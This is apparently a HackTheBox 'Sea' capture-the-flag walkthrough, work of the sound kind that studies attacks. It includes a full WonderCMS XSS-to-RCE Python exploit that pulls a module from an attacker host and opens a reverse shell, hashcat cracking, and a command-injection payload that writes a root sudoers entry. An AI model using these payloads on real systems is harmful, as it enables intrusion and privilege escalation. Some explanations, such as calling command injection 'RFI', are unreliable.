HackTheBox - Sea writeup

First view/look

We can do a Nmap scan on the target to see which ports are open to get the first look

nmap -sCV $box

We can know now that we have two ports open 1. SSH - OpenSSH 8.2p1 2. HTTP - Apache httpd 2.4.41 looks like any Linux machine, you need to exploit the site you can see on http then authenticate to ssh to get a user flag then continue to privilage escalation.

First look for the site

Note: you should add [box_ip sea.htb] to your /etc/hosts file

We can see here that we got this page, but when clicking contact it showing us a page has a contact form, but nothing interested we can get there.

feroxbuster -u http://sea.htb -w /usr/share/wordlists/dirb/big.txt

We can see now that we have some interesting things like /themes/bike/version for example

If we visit that page we can see the version but not the service used unfortunately.

if we tried different wordlist, we can get an interesting file

We can see README.md contents to know what is the service used there

┌──🮤 CHANGE ME🮥─🮤 192.168.xx.xxx🮥─🮤 10.10.xx.xx🮥
├──🮤  ~/feroxbuster🮥                                                                                                       
└─   curl sea.htb/themes/bike/README.md                                                                         [ 3:20PM ] 
# WonderCMS bike theme

## Description
Includes animations.

## Author: turboblack

## Preview
![Theme preview](/preview.jpg)

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.

Now we know that the service is WonderCMS v3.2.0

First thing we should take care about is the PoCs we can get after we knew the service

We can use this exploit to get a reverse shell as www-data

Now we can get back to the Contact form and paste this to the admin as the exploit says:

Edited the code to solve the problem with urlWithoutLogBase Variable Problem:

# Exploit: WonderCMS XSS to RCE
import sys
import requests
import os
import bs4

if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
else:
  data = '''
var url = "'''+str(sys.argv[1])+'''";
if (url.endsWith("/")) {
 url = url.slice(0, -1);
}
var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = new URL(urlWithoutLog).hostname; 
var token = document.querySelectorAll('[name="token"]')[0].value;
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.99:8000/main.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
 if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;
   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
   xhr4.send();
   xhr4.onload = function() {
     if (xhr4.status == 200) {
       var ip = "'''+str(sys.argv[2])+'''";
       var port = "'''+str(sys.argv[3])+'''";
       var xhr5 = new XMLHttpRequest();
       xhr5.withCredentials = true;
       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
       xhr5.send();
       
     }
   };
 }
};
'''
  try:
    open("xss.js","w").write(data)
    print("[+] xss.js is created")
    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
    print("----------------------------\n")
    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
    XSSlink = XSSlink.strip(" ")
    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
    print("----------------------------\n")

    print("\nstarting HTTP server to allow the access to xss.js")
    os.system("python3 -m http.server\n")
  except: print(data,"\n","//write this to a file")

We got the shell successfully!, but make sure to visit http://sea.htb/themes/bike/revshell-main/rev.php?lhost=YOUR_IP&lport=YOUR_LISTENING_PORT , because we installed main.zip file to our own, so if you unzipped the file you will see a directory called revshell_main and a rev.php file inside, so this is why we need to visit the imported Module there to execute our reverse shell!

Foothold - User flag

Now we have a shell as www-data, first thing to come in mind is to visit /var/www/sea to see if there is any configuration file can give us sensitive information to move one step further, and maybe a password!

We found a database.js file inside data directory, So we can see if there is any user information there or important information.

We got a password, we need to crack it but we don't know for which user is this, So we can see /etc/passwd for any users there we can see to know if we cracked the password which user to authenticate to ssh by.

We can see just amay here, so the password is the amay password.

— Cracking the password using hashcat:

hashcat -m 3200 amay_hash.txt /usr/share/wordlists/rockyou.txt

We can now authenticate via ssh by amay

— Authentiacating via SSH:

ssh amay@sea.htb

Privilage Escalation

As we can't run sudo on amay, we should check running ports by running ssh -tuln to see which running ports are available to forwarded it to privilage escalate!

ss -tuln

We can see 8080 port is running, so we should port forward it to see what interesting things we can see there.

— Port forwarding command:

ssh amay@sea.htb -L 8080:127.0.0.1:8080

Now we should visit http://localhost:8080in our local machine to see what is running on this port

First, you will get an alert ask you for the username and the password, you can use the same as SSH.

Then, we can get this page:

We can see a log file and an Analyze button, we can get suspicious logs.

Our SSH session detected as suspicious pattern.

First thing to come here in mind, that maybe there is LFI here??

We can use Burp suite change requests to see if the site is vulnerable to LFI or even RFI?

Looks like it's vulnerable to LFI, ammmm, we can now try if it's vulnerable also to RFI or ...?

As we used log_file=%2Fetc%2Fpasswd which means /etc/passwd, we can now try log_file=%2Fetc%2Fpasswd+%26%26+id+#

Ohh, it's really vulnerable to RFI!!

As we can execute commands as root, We can now add amay to sudeors with full permission to gain full access to root!

— Adding Amay to sudeors with Full Permission:

log_file=/etc/passwd+%26%26+echo+"amay+ALL=(ALL)+NOPASSWD:+ALL"+>+/etc/sudoers.d/amay+#

We can now in our SSH session executing sudo -l to check if we are now in sudeors files or not, then sudo -s to get into root!

Sea Machine Pwned!!

You can support me if you liked the content, thank you!!

Last updated 4 months ago

Was this helpful?